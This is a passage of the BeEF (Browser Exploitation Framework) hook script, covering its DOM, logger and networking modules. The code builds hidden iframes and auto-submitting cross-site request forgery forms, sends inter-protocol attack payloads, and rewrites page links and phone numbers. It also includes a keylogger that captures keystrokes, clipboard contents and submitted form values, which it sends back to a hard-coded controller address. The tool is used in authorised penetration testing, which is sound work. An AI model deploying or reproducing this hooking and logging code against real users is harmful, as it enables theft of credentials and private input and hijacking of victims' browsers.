6224 if(typeof attributes[index] == 'string') {
6225 el.setAttribute(index, attributes[index]);
6226 }
6227 }
6228
6229 return el;
6230 },
6231
6232 /**
6233 * Removes element from the DOM.
6234 * @param: {String or DOM Object} the target element to be removed.
6235 */
6236 removeElement: function(el) {
6237 if (!beef.dom.isDOMElement(el))
6238 {
6239 el = document.getElementById(el);
6240 }
6241 try {
6242 el.parentNode.removeChild(el);
6243 } catch (e) { }
6244 },
6245
6246 /**
6247 * Tests if the object is a DOM element.
6248 * @param: {Object} the DOM element.
6249 * @return: true if the object is a DOM element.
6250 */
6251 isDOMElement: function(obj) {
6252 return (obj.nodeType) ? true : false;
6253 },
6254
6255 /**
6256 * Creates an invisible iframe on the hook browser's page.
6257 * @return: the iframe.
6258 */
6259 createInvisibleIframe: function() {
6260 var iframe = this.createElement('iframe', {
6261 width: '1px',
6262 height: '1px',
6263 style: 'visibility:hidden;'
6264 });
6265
6266 document.body.appendChild(iframe);
6267
6268 return iframe;
6269 },
6270
6271 /**
6272 * Returns the highest current z-index
6273 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
6274 * @return: {Integer} Highest z-index in the DOM
6275 * OR
6276 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
6277 */
6278 getHighestZindex: function(include_id) {
6279 var highest = {'height':0, 'elem':''};
6280 $j('*').each(function() {
6281 var current_high = parseInt($j(this).css("zIndex"),10);
6282 if (current_high > highest.height) {
6283 highest.height = current_high;
6284 highest.elem = $j(this).attr('id');
6285 }
6286 });
6287
6288 if (include_id) {
6289 return highest;
6290 } else {
6291 return highest.height;
6292 }
6293 },
6294
6295 /**
6296 * Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
6297 * is assigned to created iframe tag's src attribute resulting in GET request to that URI.
6298 * example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
6299 * @param: {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
6300 * @param: {Hash} params: list of params that will be sent in request.
6301 * @param: {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
6302 * @param: {Function} a callback function to fire once the iFrame has loaded
6303 * @return: {Object} the inserted iFrame
6304 *
6305 */
6306 createIframe: function(type, params, styles, onload) {
6307 var css = {};
6308
6309 if (type == 'hidden') {
6310 css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
6311 } else if (type == 'fullscreen') {
6312 css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
6313 $j('body').css({'padding':'0px', 'margin':'0px'});
6314 } else {
6315 css = styles;
6316 $j('body').css({'padding':'0px', 'margin':'0px'});
6317 }
6318 var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
6319
6320 return iframe;
6321 },
6322
6323 /**
6324 * Load the link (href value) in an overlay foreground iFrame.
6325 * The BeEF hook continues to run in background.
6326 * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
6327 * Framebusting techniques, this will not work.
6328 */
6329 persistentIframe: function(){
6330 $j('a').click(function(e) {
6331 if ($j(this).attr('href') != '')
6332 {
6333 e.preventDefault();
6334 beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
6335 $j(document).attr('title', $j(this).html());
6336 document.body.scroll = "no";
6337 document.documentElement.style.overflow = 'hidden';
6338 }
6339 });
6340 },
6341
6342 /**
6343 * Load a full screen div that is black, or, transparent
6344 * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
6345 * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
6346 * opacity:0-100 // Lower number = less grayout higher = more of a blackout
6347 * // By default this is 70
6348 * zindex: # // HTML elements with a higher zindex appear on top of the gray out
6349 * // By default this will use beef.dom.getHighestZindex to always go to the top
6350 * bgcolor: (#xxxxxx) // Standard RGB Hex color code
6351 * // By default this is #000000
6352 */
6353 grayOut: function(vis, options) {
6354 // in any order. Pass only the properties you need to set.
6355 var options = options || {};
6356 var zindex = options.zindex || beef.dom.getHighestZindex()+1;
6357 var opacity = options.opacity || 70;
6358 var opaque = (opacity / 100);
6359 var bgcolor = options.bgcolor || '#000000';
6360 var dark=document.getElementById('darkenScreenObject');
6361 if (!dark) {
6362 // The dark layer doesn't exist, it's never been created. So we'll
6363 // create it here and apply some basic styles.
6364 // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
6365 var tbody = document.getElementsByTagName("body")[0];
6366 var tnode = document.createElement('div'); // Create the layer.
6367 tnode.style.position='absolute'; // Position absolutely
6368 tnode.style.top='0px'; // In the top
6369 tnode.style.left='0px'; // Left corner of the page
6370 tnode.style.overflow='hidden'; // Try to avoid making scroll bars
6371 tnode.style.display='none'; // Start out Hidden
6372 tnode.id='darkenScreenObject'; // Name it so we can find it later
6373 tbody.appendChild(tnode); // Add it to the web page
6374 dark=document.getElementById('darkenScreenObject'); // Get the object.
6375 }
6376 if (vis) {
6377 // Calculate the page width and height
6378 if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
6379 var pageWidth = document.body.scrollWidth+'px';
6380 var pageHeight = document.body.scrollHeight+'px';
6381 } else if( document.body.offsetWidth ) {
6382 var pageWidth = document.body.offsetWidth+'px';
6383 var pageHeight = document.body.offsetHeight+'px';
6384 } else {
6385 var pageWidth='100%';
6386 var pageHeight='100%';
6387 }
6388 //set the shader to cover the entire page and make it visible.
6389 dark.style.opacity=opaque;
6390 dark.style.MozOpacity=opaque;
6391 dark.style.filter='alpha(opacity='+opacity+')';
6392 dark.style.zIndex=zindex;
6393 dark.style.backgroundColor=bgcolor;
6394 dark.style.width= pageWidth;
6395 dark.style.height= pageHeight;
6396 dark.style.display='block';
6397 } else {
6398 dark.style.display='none';
6399 }
6400 },
6401
6402 /**
6403 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
6404 * or, re-writing a document this is useful.
6405 */
6406 removeStylesheets: function() {
6407 $j('link[rel=stylesheet]').remove();
6408 $j('style').remove();
6409 },
6410
6411 /**
6412 * Create a form element with the specified parameters, appending it to the DOM if append == true
6413 * @param: {Hash} params: params to be applied to the form element
6414 * @param: {Boolean} append: automatically append the form to the body
6415 * @return: {Object} a form object
6416 */
6417 createForm: function(params, append) {
6418 var form = $j('<form></form>').attr(params);
6419 if (append)
6420 $j('body').append(form);
6421 return form;
6422 },
6423
6424 /**
6425 * Get the location of the current page.
6426 * @return: the location.
6427 */
6428 getLocation: function() {
6429 return document.location.href;
6430 },
6431
6432 /**
6433 * Get links of the current page.
6434 * @return: array of URLs.
6435 */
6436 getLinks: function() {
6437 var linksarray = [];
6438 var links = document.links;
6439 for(var i = 0; i<links.length; i++) {
6440 linksarray = linksarray.concat(links[i].href)
6441 };
6442 return linksarray
6443 },
6444
6445 /**
6446 * Rewrites all links matched by selector to url, also rebinds the click method to simply return true
6447 * @param: {String} url: the url to be rewritten
6448 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
6449 * @return: {Number} the amount of links found in the DOM and rewritten.
6450 */
6451 rewriteLinks: function(url, selector) {
6452 var sel = (selector == null) ? 'a' : selector;
6453 return $j(sel).each(function() {
6454 if ($j(this).attr('href') != null)
6455 {
6456 $j(this).attr('href', url).click(function() { return true; });
6457 }
6458 }).length;
6459 },
6460
6461 /**
6462 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
6463 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
6464 * @param: {String} url: the url to be rewritten
6465 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
6466 * @return: {Number} the amount of links found in the DOM and rewritten.
6467 */
6468 rewriteLinksClickEvents: function(url, selector) {
6469 var sel = (selector == null) ? 'a' : selector;
6470 return $j(sel).each(function() {
6471 if ($j(this).attr('href') != null)
6472 {
6473 $j(this).click(function() {this.href=url});
6474 }
6475 }).length;
6476 },
6477
6478 /**
6479 * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
6480 * @param: {String} old_protocol: the old link protocol to be rewritten
6481 * @param: {String} new_protocol: the new link protocol to be written
6482 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
6483 * @return: {Number} the amount of links found in the DOM and rewritten.
6484 */
6485 rewriteLinksProtocol: function(old_protocol, new_protocol, selector) {
6486
6487 var count = 0;
6488 var re = new RegExp(old_protocol+"://", "gi");
6489 var sel = (selector == null) ? 'a' : selector;
6490
6491 $j(sel).each(function() {
6492 if ($j(this).attr('href') != null) {
6493 var url = $j(this).attr('href');
6494 if (url.match(re)) {
6495 $j(this).attr('href', url.replace(re, new_protocol+"://")).click(function() { return true; });
6496 count++;
6497 }
6498 }
6499 });
6500
6501 return count;
6502 },
6503
6504 /**
6505 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
6506 * @param: {String} new_number: the new link telephone number to be written
6507 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
6508 * @return: {Number} the amount of links found in the DOM and rewritten.
6509 */
6510 rewriteTelLinks: function(new_number, selector) {
6511
6512 var count = 0;
6513 var re = new RegExp("tel:/?/?.*", "gi");
6514 var sel = (selector == null) ? 'a' : selector;
6515
6516 $j(sel).each(function() {
6517 if ($j(this).attr('href') != null) {
6518 var url = $j(this).attr('href');
6519 if (url.match(re)) {
6520 $j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
6521 count++;
6522 }
6523 }
6524 });
6525
6526 return count;
6527 },
6528
6529 /**
6530 * Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
6531 * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
6532 * @return: {String} the parameters as a string ready to append to applet/embed/object tags (ex.: <param name='abc' value='test' />).
6533 */
6534 parseAppletParams: function(params){
6535 var result = '';
6536 for (i in params){
6537 var param = params[i];
6538 for(key in param){
6539 result += "<param name='" + key + "' value='" + param[key] + "' />";
6540 }
6541 }
6542 return result;
6543 },
6544
6545 /**
6546 * Attach an applet to the DOM, using the best approach for differet browsers (object/applet/embed).
6547 * example usage in the code, using a JAR archive (recommended and faster):
6548 * beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D.class', null, 'http://127.0.0.1:3000/ui/media/images/target.jar', [{'param1':'1', 'param2':'2'}]);
6549 * example usage in the code, using codebase:
6550 * beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D', 'http://127.0.0.1:3000/', null, null);
6551 * @params: {String} id: reference identifier to the applet.
6552 * @params: {String} code: name of the class to be loaded. For example, beef.class.
6553 * @params: {String} codebase: the URL of the codebase (usually used when loading a single class for an unsigned applet).
6554 * @params: {String} archive: the jar that contains the code.
6555 * @params: {String} params: an array of additional params that the applet except.
6556 */
6557 attachApplet: function(id, name, code, codebase, archive, params) {
6558 var content = null;
6559 if (beef.browser.isIE()) {
6560 content = "" + // the classid means 'use the latest JRE available to launch the applet'
6561 "<object id='" + id + "'classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' " +
6562 "height='0' width='0' name='" + name + "'> " +
6563 "<param name='code' value='" + code + "' />";
6564
6565 if (codebase != null) {
6566 content += "<param name='codebase' value='" + codebase + "' />"
6567 }
6568 if (archive != null){
6569 content += "<param name='archive' value='" + archive + "' />";
6570 }
6571 if (params != null) {
6572 content += beef.dom.parseAppletParams(params);
6573 }
6574 content += "</object>";
6575 }
6576 if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
6577
6578 if (codebase != null) {
6579 content = "" +
6580 "<applet id='" + id + "' code='" + code + "' " +
6581 "codebase='" + codebase + "' " +
6582 "height='0' width='0' name='" + name + "'>";
6583 } else {
6584 content = "" +
6585 "<applet id='" + id + "' code='" + code + "' " +
6586 "archive='" + archive + "' " +
6587 "height='0' width='0' name='" + name + "'>";
6588 }
6589
6590 if (params != null) {
6591 content += beef.dom.parseAppletParams(params);
6592 }
6593 content += "</applet>";
6594 }
6595 // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
6596// if (beef.browser.isFF()) {
6597// if (codebase != null) {
6598// content = "" +
6599// "<embed id='" + id + "' code='" + code + "' " +
6600// "type='application/x-java-applet' codebase='" + codebase + "' " +
6601// "height='0' width='0' name='" + name + "'>";
6602// } else {
6603// content = "" +
6604// "<embed id='" + id + "' code='" + code + "' " +
6605// "type='application/x-java-applet' archive='" + archive + "' " +
6606// "height='0' width='0' name='" + name + "'>";
6607// }
6608//
6609// if (params != null) {
6610// content += beef.dom.parseAppletParams(params);
6611// }
6612// content += "</embed>";
6613// }
6614 $j('body').append(content);
6615 },
6616
6617 /**
6618 * Given an id, remove the applet from the DOM.
6619 * @params: {String} id: reference identifier to the applet.
6620 */
6621 detachApplet: function(id) {
6622 $j('#' + id + '').detach();
6623 },
6624
6625 /**
6626 * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
6627 * @params: {String} action: the form action attribute, where the request will be sent.
6628 * @params: {String} method: HTTP method, usually POST.
6629 * @params: {String} enctype: form encoding type
6630 * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
6631 * example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
6632 */
6633 createIframeXsrfForm: function(action, method, enctype, inputs){
6634 var iframeXsrf = beef.dom.createInvisibleIframe();
6635
6636 var formXsrf = document.createElement('form');
6637 formXsrf.setAttribute('action', action);
6638 formXsrf.setAttribute('method', method);
6639 formXsrf.setAttribute('enctype', enctype);
6640
6641 var input = null;
6642 for (i in inputs){
6643 var attributes = inputs[i];
6644 input = document.createElement('input');
6645 for(key in attributes){
6646 input.setAttribute(key, attributes[key]);
6647 }
6648 formXsrf.appendChild(input);
6649 }
6650 iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
6651 formXsrf.submit();
6652
6653 return iframeXsrf;
6654 },
6655
6656 /**
6657 * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
6658 * @params: {String} rhost: remote host ip/domain
6659 * @params: {String} rport: remote port
6660 * @params: {String} commands: protocol commands to be executed by the remote host:port service
6661 */
6662 createIframeIpecForm: function(rhost, rport, path, commands){
6663 var iframeIpec = beef.dom.createInvisibleIframe();
6664
6665 var formIpec = document.createElement('form');
6666 formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
6667 formIpec.setAttribute('method', 'POST');
6668 formIpec.setAttribute('enctype', 'multipart/form-data');
6669
6670 input = document.createElement('textarea');
6671 input.setAttribute('name', Math.random().toString(36).substring(5));
6672 input.value = commands;
6673 formIpec.appendChild(input);
6674 iframeIpec.contentWindow.document.body.appendChild(formIpec);
6675 formIpec.submit();
6676
6677 return iframeIpec;
6678 }
6679
6680};
6681
6682beef.regCmp('beef.dom');
6683
6684
6685//
6686// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
6687// Browser Exploitation Framework (BeEF) - http://beefproject.com
6688// See the file 'doc/COPYING' for copying permission
6689//
6690
6691/*!
6692 * @literal object: beef.logger
6693 *
6694 * Provides logging capabilities.
6695 */
6696beef.logger = {
6697
6698 running: false,
6699 /**
6700 * Internal logger id
6701 */
6702 id: 0,
6703 /**
6704 * Holds events created by user, to be sent back to BeEF
6705 */
6706 events: [],
6707 /**
6708 * Holds current stream of key presses
6709 */
6710 stream: [],
6711 /**
6712 * Contains current target of key presses
6713 */
6714 target: null,
6715 /**
6716 * Holds the time the logger was started
6717 */
6718 time: null,
6719 /**
6720 * Holds the event details to be sent to BeEF
6721 */
6722 e: function() {
6723 this.id = beef.logger.get_id();
6724 this.time = beef.logger.get_timestamp();
6725 this.type = null;
6726 this.x = 0;
6727 this.y = 0;
6728 this.target = null;
6729 this.data = null;
6730 this.mods = null;
6731 },
6732
6733 /**
6734 * Starts the logger
6735 */
6736 start: function() {
6737
6738 beef.browser.hookChildFrames();
6739 this.running = true;
6740 var d = new Date();
6741 this.time = d.getTime();
6742
6743 $j(document).keypress(
6744 function(e) { beef.logger.keypress(e); }
6745 ).click(
6746 function(e) { beef.logger.click(e); }
6747 );
6748 $j(window).focus(
6749 function(e) { beef.logger.win_focus(e); }
6750 ).blur(
6751 function(e) { beef.logger.win_blur(e); }
6752 );
6753 $j('form').submit(
6754 function(e) { beef.logger.submit(e); }
6755 );
6756 document.body.oncopy = function() {
6757 setTimeout("beef.logger.copy();", 10);
6758 };
6759 document.body.oncut = function() {
6760 setTimeout("beef.logger.cut();", 10);
6761 };
6762 document.body.onpaste = function() {
6763 beef.logger.paste();
6764 }
6765 },
6766
6767 /**
6768 * Stops the logger
6769 */
6770 stop: function() {
6771 this.running = false;
6772 clearInterval(this.timer);
6773 $j(document).keypress(null);
6774 },
6775
6776 /**
6777 * Get id
6778 */
6779 get_id: function() {
6780 this.id++;
6781 return this.id;
6782 },
6783
6784 /**
6785 * Click function fires when the user clicks the mouse.
6786 */
6787 click: function(e) {
6788 var c = new beef.logger.e();
6789 c.type = 'click';
6790 c.x = e.pageX;
6791 c.y = e.pageY;
6792 c.target = beef.logger.get_dom_identifier(e.target);
6793 this.events.push(c);
6794 },
6795
6796 /**
6797 * Fires when the window element has regained focus
6798 */
6799 win_focus: function(e) {
6800 var f = new beef.logger.e();
6801 f.type = 'focus';
6802 this.events.push(f);
6803 },
6804
6805 /**
6806 * Fires when the window element has lost focus
6807 */
6808 win_blur: function(e) {
6809 var b = new beef.logger.e();
6810 b.type = 'blur';
6811 this.events.push(b);
6812 },
6813
6814 /**
6815 * Keypress function fires everytime a key is pressed.
6816 * @param {Object} e: event object
6817 */
6818 keypress: function(e) {
6819 if (this.target == null || ($j(this.target).get(0) !== $j(e.target).get(0)))
6820 {
6821 beef.logger.push_stream();
6822 this.target = e.target;
6823 }
6824 this.stream.push({'char':e.which, 'modifiers': {'alt':e.altKey, 'ctrl':e.ctrlKey, 'shift':e.shiftKey}});
6825 },
6826
6827 /**
6828 * Copy function fires when the user copies data to the clipboard.
6829 */
6830 copy: function(x) {
6831 try {
6832 var c = new beef.logger.e();
6833 c.type = 'copy';
6834 c.data = clipboardData.getData("Text");
6835 this.events.push(c);
6836 } catch(e) {}
6837 },
6838
6839 /**
6840 * Cut function fires when the user cuts data to the clipboard.
6841 */
6842 cut: function() {
6843 try {
6844 var c = new beef.logger.e();
6845 c.type = 'cut';
6846 c.data = clipboardData.getData("Text");
6847 this.events.push(c);
6848 } catch(e) {}
6849 },
6850
6851 /**
6852 * Paste function fires when the user pastes data from the clipboard.
6853 */
6854 paste: function() {
6855 try {
6856 var c = new beef.logger.e();
6857 c.type = 'paste';
6858 c.data = clipboardData.getData("Text");
6859 this.events.push(c);
6860 } catch(e) {}
6861 },
6862
6863 /**
6864 * Submit function fires whenever a form is submitted
6865 * TODO: Cleanup this function
6866 */
6867 submit: function(e) {
6868 try {
6869 var f = new beef.logger.e();
6870 var values = "";
6871 f.type = 'submit';
6872 f.target = beef.logger.get_dom_identifier(e.target);
6873 for (var i = 0; i < e.target.elements.length; i++) {
6874 values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
6875 }
6876 f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
6877 this.events.push(f);
6878 } catch(e) {}
6879 },
6880
6881 /**
6882 * Pushes the current stream to the events queue
6883 */
6884 push_stream: function() {
6885 if (this.stream.length > 0)
6886 {
6887 this.events.push(beef.logger.parse_stream());
6888 this.stream = [];
6889 }
6890 },
6891
6892 /**
6893 * Translate DOM Object to a readable string
6894 */
6895 get_dom_identifier: function(target) {
6896 target = (target == null) ? this.target : target;
6897 var id = '';
6898 if (target)
6899 {
6900 id = target.tagName.toLowerCase();
6901 id += ($j(target).attr('id')) ? '#'+$j(target).attr('id') : ' ';
6902 id += ($j(target).attr('name')) ? '('+$j(target).attr('name')+')' : '';
6903 }
6904 return id;
6905 },
6906
6907 /**
6908 * Formats the timestamp
6909 * @return {String} timestamp string
6910 */
6911 get_timestamp: function() {
6912 var d = new Date();
6913 return ((d.getTime() - this.time) / 1000).toFixed(3);
6914 },
6915
6916 /**
6917 * Parses stream array and creates history string
6918 */
6919 parse_stream: function() {
6920 var s = '';
6921 var mods = '';
6922 for (var i in this.stream){
6923 try{
6924 var mod = this.stream[i]['modifiers'];
6925 s += String.fromCharCode(this.stream[i]['char']);
6926 if(typeof mod != 'undefined' &&
6927 (mod['alt'] == true ||
6928 mod['ctrl'] == true ||
6929 mod['shift'] == true)){
6930 mods += (mod['alt']) ? ' [Alt] ' : '';
6931 mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
6932 mods += (mod['shift']) ? ' [Shift] ' : '';
6933 mods += String.fromCharCode(this.stream[i]['char']);
6934 }
6935
6936 }catch(e){}
6937 }
6938 var k = new beef.logger.e();
6939 k.type = 'keys';
6940 k.target = beef.logger.get_dom_identifier();
6941 k.data = s;
6942 k.mods = mods;
6943 return k;
6944 },
6945
6946 /**
6947 * Queue results to be sent back to framework
6948 */
6949 queue: function() {
6950 beef.logger.push_stream();
6951 if (this.events.length > 0)
6952 {
6953 beef.net.queue('/event', 0, this.events);
6954 this.events = [];
6955 }
6956 }
6957
6958};
6959
6960beef.regCmp('beef.logger');
6961
6962
6963//
6964// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
6965// Browser Exploitation Framework (BeEF) - http://beefproject.com
6966// See the file 'doc/COPYING' for copying permission
6967//
6968
6969/*!
6970 * @literal object: beef.net
6971 *
6972 * Provides basic networking functions,
6973 * like beef.net.request and beef.net.forgeRequest,
6974 * used by BeEF command modules and the Requester extension,
6975 * as well as beef.net.send which is used to return commands
6976 * to BeEF server-side components.
6977 *
6978 * Also, it contains the core methods used by the XHR-polling
6979 * mechanism (flush, queue)
6980 */
6981beef.net = {
6982
6983 host: "192.168.11.2",
6984 port: "3000",
6985 hook: "/hook.js",
6986 httpproto: "https",
6987 handler: '/dh',
6988 chop: 500,
6989 pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
6990 sid_count: 0,
6991 cmd_queue: [],
6992
6993 /**
6994 * Command object. This represents the data to be sent back to BeEF,
6995 * using the beef.net.send() method.
6996 */
6997 command: function () {
6998 this.cid = null;
6999 this.results = null;
7000 this.status = null;
7001 this.handler = null;
7002 this.callback = null;
7003 },
7004
7005 /**
7006 * Packet object. A single chunk of data. X packets -> 1 stream
7007 */
7008 packet: function () {
7009 this.id = null;
7010 this.data = null;
7011 },
7012
7013 /**
7014 * Stream object. Contains X packets, which are command result chunks.
7015 */
7016 stream: function () {
7017 this.id = null;
7018 this.packets = [];
7019 this.pc = 0;
7020 this.get_base_url_length = function () {
7021 return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
7022 };
7023 this.get_packet_data = function () {
7024 var p = this.packets.shift();
7025 return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
7026 };
7027 },
7028
7029 /**
7030 * Response Object - used in the beef.net.request callback
7031 * NOTE: as we are using async mode, the response object will be empty if returned.
7032 * Using sync mode, request obj fields will be populated.
7033 */
7034 response: function () {
7035 this.status_code = null; // 500, 404, 200, 302
7036 this.status_text = null; // success, timeout, error, ...
7037 this.response_body = null; // "<html>…." if not a cross-origin request
7038 this.port_status = null; // tcp port is open, closed or not http
7039 this.was_cross_domain = null; // true or false
7040 this.was_timedout = null; // the user specified timeout was reached
7041 this.duration = null; // how long it took for the request to complete
7042 this.headers = null; // full response headers
7043 },
7044
7045 /**
7046 * Queues the specified command results.
7047 * @param: {String} handler: the server-side handler that will be called
7048 * @param: {Integer} cid: command id
7049 * @param: {String} results: the data to send
7050 * @param: {Integer} status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
7051 * @param: {Function} callback: the function to call after execution
7052 */
7053 queue: function (handler, cid, results, status, callback) {
7054 if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
7055 var s = new beef.net.command();
7056 s.cid = cid;
7057 s.results = beef.net.clean(results);
7058 s.status = status;
7059 s.callback = callback;
7060 s.handler = handler;
7061 this.cmd_queue.push(s);
7062 }
7063 },
7064
7065 /**
7066 * Queues the current command results and flushes the queue straight away.
7067 * NOTE: Always send Browser Fingerprinting results
7068 * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
7069 * even if WebSockets are enabled.
7070 * @param: {String} handler: the server-side handler that will be called
7071 * @param: {Integer} cid: command id
7072 * @param: {String} results: the data to send
7073 * @param: {Integer} exec_status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
7074 * @param: {Function} callback: the function to call after execution
7075 * @return: {Integer} exec_status: the command module execution status (defaults to 0 - 'unknown' if status is null)
7076 */
7077 send: function (handler, cid, results, exec_status, callback) {
7078 // defaults to 'unknown' execution status if no parameter is provided, otherwise set the status
7079 var status = 0;
7080 if (exec_status != null && parseInt(Number(exec_status)) == exec_status){ status = exec_status}
7081
7082 if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
7083 this.queue(handler, cid, results, status, callback);
7084 this.flush();
7085 } else {
7086 try {
7087 beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
7088 '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
7089 '", "status": "' + exec_status +
7090 '", "callback": "' + callback +
7091 '","bh":"' + beef.session.get_hook_session_id() + '" }');
7092 } catch (e) {
7093 this.queue(handler, cid, results, status, callback);
7094 this.flush();
7095 }
7096 }
7097
7098 return status;
7099 },
7100
7101 /**
7102 * Flush all currently queued command results to the framework,
7103 * chopping the data in chunks ('chunk' method) which will be re-assembled
7104 * server-side by the network stack.
7105 * NOTE: currently 'flush' is used only with the default
7106 * XHR-polling mechanism. If WebSockets are used, the data is sent
7107 * back to BeEF straight away.
7108 */
7109 flush: function () {
7110 if (this.cmd_queue.length > 0) {
7111 var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
7112 this.cmd_queue.length = 0;
7113 this.sid_count++;
7114 var stream = new this.stream();
7115 stream.id = this.sid_count;
7116 var pad = stream.get_base_url_length() + this.pad;
7117 //cant continue if chop amount is too low
7118 if ((this.chop - pad) > 0) {
7119 var data = this.chunk(data, (this.chop - pad));
7120 for (var i = 1; i <= data.length; i++) {
7121 var packet = new this.packet();
7122 packet.id = i;
7123 packet.data = data[(i - 1)];
7124 stream.packets.push(packet);
7125 }
7126 stream.pc = stream.packets.length;
7127 this.push(stream);
7128 }
7129 }
7130 },
7131
7132 /**
7133 * Split the input data into chunk lengths determined by the amount parameter.
7134 * @param: {String} str: the input data
7135 * @param: {Integer} amount: chunk length
7136 */
7137 chunk: function (str, amount) {
7138 if (typeof amount == 'undefined') n = 2;
7139 return str.match(RegExp('.{1,' + amount + '}', 'g'));
7140 },
7141
7142 /**
7143 * Push the input stream back to the BeEF server-side components.
7144 * It uses beef.net.request to send back the data.
7145 * @param: {Object} stream: the stream object to be sent back.
7146 */
7147 push: function (stream) {
7148 //need to implement wait feature here eventually
7149 for (var i = 0; i < stream.pc; i++) {
7150 this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
7151 }
7152 },
7153
7154 /**
7155 * Performs http requests
7156 * @param: {String} scheme: HTTP or HTTPS
7157 * @param: {String} method: GET or POST
7158 * @param: {String} domain: bindshell.net, 192.168.3.4, etc
7159 * @param: {Int} port: 80, 5900, etc
7160 * @param: {String} path: /path/to/resource
7161 * @param: {String} anchor: this is the value that comes after the # in the URL
7162 * @param: {String} data: This will be used as the query string for a GET or post data for a POST
7163 * @param: {Int} timeout: timeout the request after N seconds
7164 * @param: {String} dataType: specify the data return type expected (ie text/html/script)
7165 * @param: {Function} callback: call the callback function at the completion of the method
7166 *
7167 * @return: {Object} response: this object contains the response details
7168 */
7169 request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
7170 //check if same domain or cross domain
7171 var cross_domain = true;
7172 if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
7173 if (document.location.port == "" || document.location.port == null) {
7174 cross_domain = !(port == "80" || port == "443");
7175 }
7176 }
7177
7178 //build the url
7179 var url = "";
7180 if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
7181 url = path;
7182 } else {
7183 url = scheme + "://" + domain;
7184 url = (port != null) ? url + ":" + port : url;
7185 url = (path != null) ? url + path : url;
7186 url = (anchor != null) ? url + "#" + anchor : url;
7187 }
7188
7189 //define response object
7190 var response = new this.response;
7191 response.was_cross_domain = cross_domain;
7192 var start_time = new Date().getTime();
7193
7194 /*
7195 * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
7196 * This will turn POSTs into GETs for remote-domain requests.
7197 */
7198 if (method == "POST") {
7199 $j.ajaxSetup({
7200 dataType: dataType
7201 });
7202 } else {
7203 $j.ajaxSetup({
7204 dataType: 'script'
7205 });
7206 }
7207
7208 //build and execute the request
7209 $j.ajax({type: method,
7210 url: url,
7211 data: data,
7212 timeout: (timeout * 1000),
7213
7214 //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
7215 beforeSend: function (xhr) {
7216 if (method == "POST") {
7217 xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
7218 }
7219 },
7220 success: function (data, textStatus, xhr) {
7221 var end_time = new Date().getTime();
7222 response.status_code = xhr.status;
7223 response.status_text = textStatus;
7224 response.response_body = data;
7225 response.port_status = "open";
